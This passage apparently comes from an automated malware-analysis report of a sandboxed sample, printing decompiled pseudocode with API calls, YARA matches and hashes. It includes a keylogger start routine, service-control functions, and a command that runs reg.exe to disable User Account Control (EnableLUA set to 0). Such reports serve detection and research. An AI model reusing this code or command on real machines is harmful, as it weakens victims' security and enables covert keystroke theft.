															 *_t51 =  *(_t124 + 0x24 + _t129 * 8) & 0x00000000;
															__eflags =  *_t51;
														}
													}
												}
											}
											 *_t97 =  *((intOrPtr*)(_t124 + 0xc));
											 *(_t124 + 0x24 + _t129 * 8) = _t97;
											 *((intOrPtr*)(_t124 + 0x1c + _t129 * 8)) = _v36;
											_v8 = 0xfffffffe;
											E0043F33F();
										} else {
											__eflags = _t78 - 0x16;
											if(_t78 == 0x16) {
												L26:
												_push(_t123);
												_push(_t123);
												_push(_t123);
												_push(_t123);
												_push(_t123);
												goto L20;
											} else {
												__eflags = _t78 - 0x22;
												if(_t78 != 0x22) {
													__eflags = _t78;
													if(_t78 == 0) {
														goto L29;
													} else {
														E004401F5(_t97);
														goto L15;
													}
												} else {
													goto L26;
												}
											}
										}
									}
								} else {
									__eflags = _t78 - 0x16;
									if(_t78 == 0x16) {
										L19:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L20:
										_t78 = L0043698A(_t78);
									} else {
										__eflags = _t78 - 0x22;
										if(_t78 == 0x22) {
											goto L19;
										}
									}
									__eflags = _t78;
									if(_t78 != 0) {
										goto L15;
									} else {
										goto L22;
									}
								}
							} else {
								L15:
							}
							return L0042FBA6();
						} else {
							__eflags = _t67 - 0x22;
							if(_t67 == 0x22) {
								goto L13;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t70 = E0043E4D0(__ebx, _t99, __edx, _a4, 0);
					L12:
					return _t70;
				}
			}
































                                    0x0043f14e
                                    0x0043f14e
                                    0x0043f153
                                    0x0043f158
                                    0x0043f168
                                    0x0043f169
                                    0x0043f172
                                    0x0043f17a
                                    0x0043f17f
                                    0x0043f182
                                    0x0043f184
                                    0x0043f190
                                    0x0043f19a
                                    0x0043f19d
                                    0x0043f19e
                                    0x0043f1a0
                                    0x0043f1d1
                                    0x0043f1d2
                                    0x0043f1d8
                                    0x00000000
                                    0x0043f1a2
                                    0x0043f1ac
                                    0x0043f1b1
                                    0x0043f1b4
                                    0x0043f1b6
                                    0x0043f1cf
                                    0x00000000
                                    0x0043f1b8
                                    0x0043f1b8
                                    0x0043f1bb
                                    0x00000000
                                    0x0043f1bd
                                    0x0043f1bd
                                    0x0043f1c0
                                    0x00000000
                                    0x0043f1c2
                                    0x00000000
                                    0x0043f1c2
                                    0x0043f1c0
                                    0x0043f1bb
                                    0x0043f1b6
                                    0x0043f186
                                    0x0043f186
                                    0x0043f189
                                    0x0043f1e0
                                    0x0043f1e0
                                    0x0043f1e1
                                    0x0043f1e2
                                    0x0043f1e3
                                    0x0043f1e5
                                    0x0043f1ea
                                    0x0043f1f2
                                    0x0043f1fa
                                    0x0043f1fe
                                    0x0043f204
                                    0x0043f205
                                    0x0043f207
                                    0x0043f209
                                    0x0043f212
                                    0x0043f217
                                    0x0043f21d
                                    0x0043f220
                                    0x0043f223
                                    0x0043f228
                                    0x0043f237
                                    0x0043f23c
                                    0x0043f23f
                                    0x0043f241
                                    0x0043f25b
                                    0x0043f268
                                    0x0043f26a
                                    0x0043f26c
                                    0x00000000
                                    0x0043f26e
                                    0x0043f26e
                                    0x0043f271
                                    0x0043f274
                                    0x0043f27f
                                    0x0043f282
                                    0x0043f287
                                    0x0043f28a
                                    0x0043f28c
                                    0x0043f2af
                                    0x0043f2af
                                    0x0043f2b4
                                    0x0043f2b9
                                    0x0043f2ba
                                    0x0043f2be
                                    0x0043f2c4
                                    0x0043f2c7
                                    0x0043f2c9
                                    0x0043f2cd
                                    0x0043f2d1
                                    0x0043f2d7
                                    0x0043f2dc
                                    0x0043f2dd
                                    0x0043f2e2
                                    0x0043f2e2
                                    0x0043f2e2
                                    0x0043f2d1
                                    0x0043f2e5
                                    0x0043f2e8
                                    0x0043f2ef
                                    0x0043f2f1
                                    0x0043f2f8
                                    0x0043f2fe
                                    0x0043f300
                                    0x0043f302
                                    0x0043f306
                                    0x0043f307
                                    0x0043f30d
                                    0x0043f313
                                    0x0043f313
                                    0x0043f313
                                    0x0043f313
                                    0x0043f307
                                    0x0043f300
                                    0x0043f2f8
                                    0x0043f31b
                                    0x0043f31d
                                    0x0043f324
                                    0x0043f328
                                    0x0043f32f
                                    0x0043f28e
                                    0x0043f28e
                                    0x0043f291
                                    0x0043f298
                                    0x0043f298
                                    0x0043f299
                                    0x0043f29a
                                    0x0043f29b
                                    0x0043f29c
                                    0x00000000
                                    0x0043f293
                                    0x0043f293
                                    0x0043f296
                                    0x0043f29f
                                    0x0043f2a1
                                    0x00000000
                                    0x0043f2a3
                                    0x0043f2a4
                                    0x00000000
                                    0x0043f2a9
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0043f296
                                    0x0043f291
                                    0x0043f28c
                                    0x0043f243
                                    0x0043f243
                                    0x0043f246
                                    0x0043f24d
                                    0x0043f24d
                                    0x0043f24e
                                    0x0043f24f
                                    0x0043f250
                                    0x0043f251
                                    0x0043f252
                                    0x0043f252
                                    0x0043f248
                                    0x0043f248
                                    0x0043f24b
                                    0x00000000
                                    0x00000000
                                    0x0043f24b
                                    0x0043f257
                                    0x0043f259
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0043f259
                                    0x0043f20b
                                    0x0043f20b
                                    0x0043f20b
                                    0x0043f33b
                                    0x0043f18b
                                    0x0043f18b
                                    0x0043f18e
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0043f18e
                                    0x0043f189
                                    0x0043f15a
                                    0x0043f15f
                                    0x0043f1dc
                                    0x0043f1df
                                    0x0043f1df

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: __cftoe
                                    • String ID:
                                    • API String ID: 4189289331-0
                                    • Opcode ID: c2a31f394107e0f3225fa1d7b5013d3964004684340a0b5a6b4c6d0f9cd202bf
                                    • Instruction ID: bcbe42ceaebb365c1ac6e2a5e9ed457d7b54482c9f0ea6a0937b1c10150bb98b
                                    • Opcode Fuzzy Hash: c2a31f394107e0f3225fa1d7b5013d3964004684340a0b5a6b4c6d0f9cd202bf
                                    • Instruction Fuzzy Hash: E451E432D00205EADF249B69DC41BAF77A8AF4D324F60527FF91592282DB3DDD048A6C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041640B, Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0041640B(char _a4) {
				struct _SERVICE_STATUS _v32;
				signed int _t16;
				void* _t19;
				void* _t20;

				_t16 = 0;
				_t20 = OpenSCManagerW(0, 0, 0x20);
				_t19 = OpenServiceW(_t20, L00401EEB( &_a4), 0x20);
				if(_t19 != 0) {
					_t16 = 0 | ControlService(_t19, 1,  &_v32) != 0x00000000;
					CloseServiceHandle(_t20);
					CloseServiceHandle(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				L00401EF0();
				return _t16;
			}







                                    0x00416416
                                    0x00416425
                                    0x00416434
                                    0x00416438
                                    0x00416459
                                    0x0041645c
                                    0x0041645f
                                    0x0041643a
                                    0x0041643b
                                    0x0041643b
                                    0x00416464
                                    0x00416471

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,00415FB6,00000000), ref: 0041641A
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,00415FB6,00000000), ref: 0041642E
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041643B
                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00415FB6,00000000), ref: 0041644A
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041645C
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041645F
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: d4eaebdc15304b872416eaa7f8d04e900d6049d733b55bafd53bfd73d26ce288
                                    • Instruction ID: 4eedda638a80435df945b1a666cb81191fe5a480f3a20e792e67f186b8beea13
                                    • Opcode Fuzzy Hash: d4eaebdc15304b872416eaa7f8d04e900d6049d733b55bafd53bfd73d26ce288
                                    • Instruction Fuzzy Hash: 16F0F6315403187BD211AF65DC89DBF3B6CDB45B92F00002AFD0593192DF28CE4596F9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00416576, Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00416576(char _a4) {
				struct _SERVICE_STATUS _v32;
				signed int _t16;
				void* _t19;
				void* _t20;

				_t16 = 0;
				_t20 = OpenSCManagerW(0, 0, 0x40);
				_t19 = OpenServiceW(_t20, L00401EEB( &_a4), 0x40);
				if(_t19 != 0) {
					_t16 = 0 | ControlService(_t19, 3,  &_v32) != 0x00000000;
					CloseServiceHandle(_t20);
					CloseServiceHandle(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				L00401EF0();
				return _t16;
			}







                                    0x00416581
                                    0x00416590
                                    0x0041659f
                                    0x004165a3
                                    0x004165c4
                                    0x004165c7
                                    0x004165ca
                                    0x004165a5
                                    0x004165a6
                                    0x004165a6
                                    0x004165cf
                                    0x004165dc

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00415EB6,00000000), ref: 00416585
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00415EB6,00000000), ref: 00416599
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165A6
                                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00415EB6,00000000), ref: 004165B5
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165C7
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165CA
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 3436dafb5ab72bcd86b129217272098d71bfff533fa1ccb5049d0d6cd0b5ba5f
                                    • Instruction ID: f156ac7e468d3ae20af57b6ed191c57fcc92838d981ab40ed78c867a72fe8b74
                                    • Opcode Fuzzy Hash: 3436dafb5ab72bcd86b129217272098d71bfff533fa1ccb5049d0d6cd0b5ba5f
                                    • Instruction Fuzzy Hash: 6DF0C2315413187BD211AF65EC49EBF3BACDB45B92B00002AFE0992196DA38CE4596E9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004093AD, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65threadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 89%
                                    			E004093AD(void* __ecx) {
				char _v28;
				void* __ebx;
				void* __edi;
				void* _t7;
				void* _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t30 = __ecx;
				_t36 =  *((char*)(__ecx + 0x4a));
				if( *((char*)(__ecx + 0x4a)) == 0) {
					_t28 = "Online Keylogger Started";
					 *((char*)(__ecx + 0x4a)) = 1;
					E00402084(_t18,  &_v28, "Online Keylogger Started");
					_t32 = _t31 - 0x18;
					E004172DA(_t32,  &_v28);
					L00409634(_t18, _t30, _t36);
					L00401FC7();
					_t33 = _t32 - 0x18;
					E00402084(_t18, _t32 - 0x18, "Online Keylogger Started");
					E00402084(_t18, _t33 - 0x18, "[Info]");
					L00416C80(_t18, _t28);
					if( *((intOrPtr*)(_t30 + 0x49)) == 0) {
						if( *_t30 == 0) {
							CreateThread(0, 0, 0x408830, _t30, 0, 0);
						}
						CreateThread(0, 0, 0x40885a, _t30, 0, 0);
					}
					return CreateThread(0, 0, 0x408869, _t30, 0, 0);
				}
				return _t7;
			}











                                    0x004093b5
                                    0x004093b8
                                    0x004093bc
                                    0x004093c2
                                    0x004093c7
                                    0x004093cf
                                    0x004093d4
                                    0x004093dc
                                    0x004093e3
                                    0x004093eb
                                    0x004093f0
                                    0x004093f6
                                    0x00409405
                                    0x0040940a
                                    0x0040941d
                                    0x00409421
                                    0x0040942d
                                    0x0040942d
                                    0x00409439
                                    0x00409439
                                    0x00000000
                                    0x00409445
                                    0x0040944d

                                    APIs
                                      • Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
                                      • Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
                                      • Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED
                                      • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00008830,?,00000000,00000000), ref: 0040942D
                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000885A,?,00000000,00000000), ref: 00409439
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00008869,?,00000000,00000000), ref: 00409445
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread$LocalTime$Eventwsprintf
                                    • String ID: Online Keylogger Started$[Info]
                                    • API String ID: 3546759147-3401407043
                                    • Opcode ID: a2041c6c2a2a3a2c9e5274fc0c7bccf85df625937437c628581770fe62eddfb0
                                    • Instruction ID: 55f70c683c1dd9f299002b3fa9371d2aabc85af949f207a7a15db3bb5bde523d
                                    • Opcode Fuzzy Hash: a2041c6c2a2a3a2c9e5274fc0c7bccf85df625937437c628581770fe62eddfb0
                                    • Instruction Fuzzy Hash: 5501C8A16002193AD62476764C86DBF7A6CCA81398F80057FFA85321C3D97D5C4A82FA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040D3F7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46processCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 50%
                                    			E0040D3F7() {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v92;
				void* __edi;
				void* _t17;
				long _t19;

				_t19 = 0x44;
				L00431F00(_t17,  &_v92, 0, _t19);
				_v92.cb = _t19;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v20);
				CloseHandle(_v20);
				return CloseHandle(_v20.hThread);
			}








                                    0x0040d402
                                    0x0040d40b
                                    0x0040d412
                                    0x0040d41b
                                    0x0040d41c
                                    0x0040d41d
                                    0x0040d41e
                                    0x0040d43b
                                    0x0040d44a
                                    0x0040d457

                                    APIs
                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,0040C5FB,00000000,0046C578,00000001), ref: 0040D43B
                                    • CloseHandle.KERNEL32(0040C5FB), ref: 0040D44A
                                    • CloseHandle.KERNEL32(00000027), ref: 0040D44F
                                    Strings
                                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040D431
                                    • C:\Windows\System32\cmd.exe, xrefs: 0040D436
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreateProcess
                                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                    • API String ID: 2922976086-4183131282
                                    • Opcode ID: ef92d07ca1aae4fdf93b7244d02a4cef1616cfdac0d91f616d34c415f3e09b10
                                    • Instruction ID: 26fca9c7a1bbdca23175ff39a315bbad59b3fabc2693cff21f74514230984448
                                    • Opcode Fuzzy Hash: ef92d07ca1aae4fdf93b7244d02a4cef1616cfdac0d91f616d34c415f3e09b10
                                    • Instruction Fuzzy Hash: BDF012B290061C7FEB105AE9DC85EEFBB6CEB48795F100476F604E6011D5715D148AA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040519B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44synchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 83%
                                    			E0040519B(void* __ecx, void* __edi) {
				void* __ebx;
				long _t19;
				intOrPtr _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				intOrPtr _t38;

				_t29 = __edi;
				_t30 = __ecx;
				 *((intOrPtr*)(__ecx + 0x60)) = 0;
				if( *((intOrPtr*)(__ecx + 0x5c)) <= 0) {
					L3:
					 *((char*)(_t30 + 0x50)) = 0;
					_t38 =  *0x46bb03; // 0x0
					if(_t38 != 0) {
						_t32 = _t31 - 0x18;
						E00402084(0, _t31 - 0x18, "Connection timeout");
						E00402084(0, _t32 - 0x18, "[WARNING]");
						L00416C80(0, _t29);
					}
					L00404E0B(_t30);
					return 1;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t19 = WaitForSingleObject( *(_t30 + 0x54), 0x3e8);
					 *((intOrPtr*)(_t30 + 0x60)) =  *((intOrPtr*)(_t30 + 0x60)) + 1;
					_t28 =  *((intOrPtr*)(_t30 + 0x60));
					if(_t19 == 0) {
						break;
					}
					if(_t28 <  *((intOrPtr*)(_t30 + 0x5c))) {
						continue;
					}
					goto L3;
				}
				CloseHandle( *(_t30 + 0x54));
				 *(_t30 + 0x54) = 0;
				 *((char*)(_t30 + 0x50)) = 0;
				SetEvent( *(_t30 + 0x58));
				return 0;
			}










                                    0x0040519b
                                    0x0040519d
                                    0x004051a1
                                    0x004051a7
                                    0x004051c6
                                    0x004051c6
                                    0x004051c9
                                    0x004051cf
                                    0x004051d1
                                    0x004051db
                                    0x004051ea
                                    0x004051ef
                                    0x004051f4
                                    0x004051f9
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004051a9
                                    0x004051a9
                                    0x004051b1
                                    0x004051b7
                                    0x004051ba
                                    0x004051bf
                                    0x00000000
                                    0x00000000
                                    0x004051c4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004051c4
                                    0x00405207
                                    0x00405210
                                    0x00405213
                                    0x00405216
                                    0x00000000

                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,00405196), ref: 004051B1
                                    • CloseHandle.KERNEL32(?), ref: 00405207
                                    • SetEvent.KERNEL32(?), ref: 00405216
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandleObjectSingleWait
                                    • String ID: Connection timeout$[WARNING]
                                    • API String ID: 2055531096-1470507543
                                    • Opcode ID: 8b6936126bbdbf1623cb9cbc7df53c6cf8ce2eb3c326d1d004a7b873d990a03d
                                    • Instruction ID: 7da91c5eb563825218e032d44bddc69cdf30f244b65d1975d56df2ebc3a46463
                                    • Opcode Fuzzy Hash: 8b6936126bbdbf1623cb9cbc7df53c6cf8ce2eb3c326d1d004a7b873d990a03d
                                    • Instruction Fuzzy Hash: B801B131A41B40AFC721AF75884651BBBA4EF0530A700447EE5C3A6AA2CBB89404CF9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0043B2BA, Relevance: 7.7, APIs: 5, Instructions: 222COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 96%
                                    			E0043B2BA(void* __ebx, void* __edx, void* __edi, void* __esi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				int _v20;
				int _v24;
				char* _v28;
				int _v32;
				char _v36;
				intOrPtr _v44;
				char _v48;
				signed int _t59;
				char* _t61;
				intOrPtr _t63;
				int _t64;
				intOrPtr* _t65;
				signed int _t68;
				intOrPtr* _t71;
				short* _t73;
				int _t74;
				int _t76;
				char _t78;
				short* _t83;
				short _t85;
				int _t91;
				int _t93;
				char* _t98;
				int _t103;
				char* _t105;
				void* _t106;
				intOrPtr _t108;
				intOrPtr _t109;
				int _t110;
				short* _t113;
				int _t114;
				int _t116;
				signed int _t117;

				_t106 = __edx;
				_t59 =  *0x46a00c; // 0xbd45ae92
				_v8 = _t59 ^ _t117;
				_t61 = _a4;
				_t91 = _a12;
				_t116 = 0;
				_v28 = _t61;
				_v20 = 0;
				_t113 = _a8;
				_v24 = _t113;
				if(_t61 == 0 || _t91 != 0) {
					if(_t113 != 0) {
						L00435507(_t91,  &_v48, _t106, _a16);
						_t98 = _v28;
						if(_t98 == 0) {
							_t63 = _v44;
							if( *((intOrPtr*)(_t63 + 0xa8)) != _t116) {
								_t64 = WideCharToMultiByte( *(_t63 + 8), _t116, _t113, 0xffffffff, _t116, _t116, _t116,  &_v20);
								if(_t64 == 0 || _v20 != _t116) {
									L55:
									_t65 = L0043A504();
									_t114 = _t113 | 0xffffffff;
									 *_t65 = 0x2a;
									goto L56;
								} else {
									_t53 = _t64 - 1; // -1
									_t114 = _t53;
									L56:
									if(_v36 != 0) {
										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
									}
									goto L59;
								}
							}
							_t68 =  *_t113 & 0x0000ffff;
							if(_t68 == 0) {
								L51:
								_t114 = _t116;
								goto L56;
							}
							while(_t68 <= 0xff) {
								_t113 =  &(_t113[1]);
								_t116 = _t116 + 1;
								_t68 =  *_t113 & 0x0000ffff;
								if(_t68 != 0) {
									continue;
								}
								goto L51;
							}
							goto L55;
						}
						_t108 = _v44;
						if( *((intOrPtr*)(_t108 + 0xa8)) != _t116) {
							if( *((intOrPtr*)(_t108 + 4)) != 1) {
								_t114 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, 0xffffffff, _t98, _t91, _t116,  &_v20);
								if(_t114 == 0) {
									if(_v20 != _t116 || GetLastError() != 0x7a) {
										L45:
										_t71 = L0043A504();
										_t116 = _t116 | 0xffffffff;
										 *_t71 = 0x2a;
										goto L51;
									} else {
										if(_t91 == 0) {
											goto L56;
										}
										_t73 = _v24;
										while(1) {
											_t109 = _v44;
											_t103 =  *(_t109 + 4);
											if(_t103 > 5) {
												_t103 = 5;
											}
											_t74 = WideCharToMultiByte( *(_t109 + 8), _t116, _t73, 1,  &_v16, _t103, _t116,  &_v20);
											_t93 = _a12;
											_t110 = _t74;
											if(_t110 == 0 || _v20 != _t116 || _t110 < 0 || _t110 > 5) {
												goto L55;
											}
											if(_t110 + _t114 > _t93) {
												goto L56;
											}
											_t76 = _t116;
											_v32 = _t76;
											if(_t110 <= 0) {
												L43:
												_t73 = _v24 + 2;
												_v24 = _t73;
												if(_t114 < _t93) {
													continue;
												}
												goto L56;
											}
											_t105 = _v28;
											while(1) {
												_t78 =  *((intOrPtr*)(_t117 + _t76 - 0xc));
												 *((char*)(_t105 + _t114)) = _t78;
												if(_t78 == 0) {
													goto L56;
												}
												_t76 = _v32 + 1;
												_t114 = _t114 + 1;
												_v32 = _t76;
												if(_t76 < _t110) {
													continue;
												}
												goto L43;
											}
											goto L56;
										}
										goto L55;
									}
								}
								if(_v20 != _t116) {
									goto L45;
								}
								_t28 = _t114 - 1; // -1
								_t116 = _t28;
								goto L51;
							}
							if(_t91 == 0) {
								L21:
								_t116 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, _t91, _t98, _t91, _t116,  &_v20);
								if(_t116 == 0 || _v20 != 0) {
									goto L45;
								} else {
									if(_v28[_t116 - 1] == 0) {
										_t116 = _t116 - 1;
									}
									goto L51;
								}
							}
							_t83 = _t113;
							_v24 = _t91;
							while( *_t83 != _t116) {
								_t83 =  &(_t83[1]);
								_t16 =  &_v24;
								 *_t16 = _v24 - 1;
								if( *_t16 != 0) {
									continue;
								}
								break;
							}
							if(_v24 != _t116 &&  *_t83 == _t116) {
								_t91 = (_t83 - _t113 >> 1) + 1;
							}
							goto L21;
						}
						if(_t91 == 0) {
							goto L51;
						}
						while( *_t113 <= 0xff) {
							_t98[_t116] =  *_t113;
							_t85 =  *_t113;
							_t113 =  &(_t113[1]);
							if(_t85 == 0) {
								goto L51;
							}
							_t116 = _t116 + 1;
							if(_t116 < _t91) {
								continue;
							}
							goto L51;
						}
						goto L45;
					}
					 *((intOrPtr*)(L0043A504())) = 0x16;
					L0043695D();
					goto L59;
				} else {
					L59:
					return L0042FD1B(_v8 ^ _t117);
				}
			}






































                                    0x0043b2ba
                                    0x0043b2c2
                                    0x0043b2c9
                                    0x0043b2cc
                                    0x0043b2d0
                                    0x0043b2d4
                                    0x0043b2d6
                                    0x0043b2d9
                                    0x0043b2dd
                                    0x0043b2e0
                                    0x0043b2e5
                                    0x0043b2f4
                                    0x0043b314
                                    0x0043b319
                                    0x0043b31e
                                    0x0043b4bb
                                    0x0043b4c4
                                    0x0043b4f6
                                    0x0043b4fe
                                    0x0043b50a
                                    0x0043b50a
                                    0x0043b50f
                                    0x0043b512
                                    0x00000000
                                    0x0043b505
                                    0x0043b505
                                    0x0043b505
                                    0x0043b518
                                    0x0043b51c
                                    0x0043b521
                                    0x0043b521
                                    0x00000000
                                    0x0043b528
                                    0x0043b4fe
                                    0x0043b4c6
                                    0x0043b4cc
                                    0x0043b4e4
                                    0x0043b4e4
                                    0x00000000
                                    0x0043b4e4
                                    0x0043b4d3
                                    0x0043b4d8
                                    0x0043b4db
                                    0x0043b4dc
                                    0x0043b4e2
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0043b4e2
                                    0x00000000
                                    0x0043b4d3
                                    0x0043b324
                                    0x0043b32d
                                    0x0043b367
                                    0x0043b3e0
                                    0x0043b3e4
                                    0x0043b3fa
                                    0x0043b4ab
                                    0x0043b4ab
                                    0x0043b4b0
                                    0x0043b4b3
                                    0x00000000
                                    0x0043b40f
                                    0x0043b411
                                    0x00000000
                                    0x00000000
                                    0x0043b417
                                    0x0043b41a
                                    0x0043b41a
                                    0x0043b41d
                                    0x0043b423
                                    0x0043b427
                                    0x0043b427
                                    0x0043b439
                                    0x0043b43f
                                    0x0043b442
                                    0x0043b446
                                    0x00000000
                                    0x00000000
                                    0x0043b46b
                                    0x00000000
                                    0x00000000
                                    0x0043b471
                                    0x0043b473
                                    0x0043b478
                                    0x0043b498
                                    0x0043b49b
                                    0x0043b49e
                                    0x0043b4a3
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0043b4a9
                                    0x0043b47a
                                    0x0043b47d
                                    0x0043b47d
                                    0x0043b481
                                    0x0043b486
                                    0x00000000
                                    0x00000000
                                    0x0043b48f
                                    0x0043b490
                                    0x0043b491
                                    0x0043b496
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0043b496
                                    0x00000000
                                    0x0043b47d
                                    0x00000000
                                    0x0043b41a
                                    0x0043b3fa
                                    0x0043b3e9
                                    0x00000000
                                    0x00000000
                                    0x0043b3ef
                                    0x0043b3ef
                                    0x00000000
                                    0x0043b3ef
                                    0x0043b36b
                                    0x0043b391
                                    0x0043b3a4
                                    0x0043b3a8
                                    0x00000000
                                    0x0043b3b8
                                    0x0043b3c0
                                    0x0043b3c6
                                    0x0043b3c6
                                    0x00000000
                                    0x0043b3c0
                                    0x0043b3a8
                                    0x0043b36d
                                    0x0043b36f
                                    0x0043b372
                                    0x0043b377
                                    0x0043b37a
                                    0x0043b37a
                                    0x0043b37e
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0043b37e
                                    0x0043b383
                                    0x0043b390
                                    0x0043b390
                                    0x00000000
                                    0x0043b383
                                    0x0043b331
                                    0x00000000
                                    0x00000000
                                    0x0043b33c
                                    0x0043b347
                                    0x0043b34a
                                    0x0043b34d
                                    0x0043b353
                                    0x00000000
                                    0x00000000
                                    0x0043b359
                                    0x0043b35c
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0043b35e
                                    0x00000000
                                    0x0043b33c
                                    0x0043b2fb
                                    0x0043b301
                                    0x00000000
                                    0x0043b2eb
                                    0x0043b52a
                                    0x0043b53a
                                    0x0043b53a

                                    Memory Dump Source
